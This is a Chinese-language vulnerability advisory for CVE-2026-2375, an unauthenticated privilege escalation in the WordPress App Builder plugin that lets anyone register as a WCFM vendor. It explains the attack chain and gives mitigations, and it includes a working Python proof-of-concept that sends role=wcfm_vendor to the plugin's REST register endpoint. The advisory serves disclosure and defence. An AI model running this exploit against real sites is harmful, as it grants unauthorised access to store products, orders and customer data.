IPBUF安全漏洞报告
English
CVE-2026-2375 CVSS 6.5 中危

CVE-2026-2375 WordPress App Builder权限提升漏洞

披露日期: 2026-03-21
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-2375
漏洞类型
权限提升
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WordPress App Builder Plugin

相关标签

权限提升WordPressCVE-2026-2375WCFMApp BuilderREST API

漏洞概述

WordPress的App Builder插件在5.5.10及以下版本中存在权限提升漏洞。由于`verify_role()`函数错误地将`wcfm_vendor`角色列入白名单,且未集成WCFM Marketplace的审批流程,未认证攻击者可以通过REST API注册接口直接获取供应商权限,从而管理产品、访问订单和商店数据。

技术细节

该漏洞源于App Builder插件中的`AuthTrails.php`文件。在处理用户注册时,`verify_role()`函数不仅允许常规角色,还错误地将`wcfm_vendor`(WCFM Marketplace供应商角色)列入白名单。在调用`wp_insert_user()`创建用户时,插件直接使用了请求参数中的`role`值,而没有验证用户是否有权获得该角色,也未触发WCFM Marketplace原本严格的供应商审核工作流。因此,攻击者只需向`/wp-json/app-builder/v1/register`接口发送POST请求,并在参数中指定`role=wcfm_vendor`,即可无需管理员审核直接注册为供应商,获得商品管理、订单访问等敏感权限。

攻击链分析

STEP 1
步骤1
攻击者识别出目标网站安装了存在漏洞的WordPress App Builder插件(版本<=5.5.10)以及WCFM Marketplace插件。
STEP 2
步骤2
攻击者构造恶意的HTTP POST请求,目标指向`/wp-json/app-builder/v1/register`接口。
STEP 3
步骤3
攻击者在请求参数中注入`role=wcfm_vendor`,并填写用户名、邮箱和密码。
STEP 4
步骤4
服务器接收请求后,`verify_role()`函数错误地允许该角色,直接创建具有供应商权限的账户。
STEP 5
步骤5
攻击者成功绕过审核,使用注册的账户登录,获得商店管理和产品操作权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual vulnerable site) target_url = "http://example.com/wp-json/app-builder/v1/register" # Exploit payload to register as a vendor payload = { "username": "attacker_vendor", "email": "[email protected]", "password": "StrongPassword123!", "role": "wcfm_vendor" # Vulnerable parameter bypassing approval } try: # Sending the registration request response = requests.post(target_url, data=payload) if response.status_code == 200 or response.status_code == 201: print("[+] Exploit successful! Vendor account created.") print("[+] Response:", response.text) else: print("[-] Exploit failed. Status code:", response.status_code) print("[-] Response:", response.text) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

App Builder Plugin <= 5.5.10

防御指南

临时缓解措施
如果无法立即升级插件,建议通过Web应用防火墙(WAF)拦截对`/wp-json/app-builder/v1/register`接口的POST请求,或者在该接口的请求体中过滤`role=wcfm_vendor`参数。同时,暂时禁用WCFM Marketplace的供应商注册功能也是一种有效的临时缓解手段。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表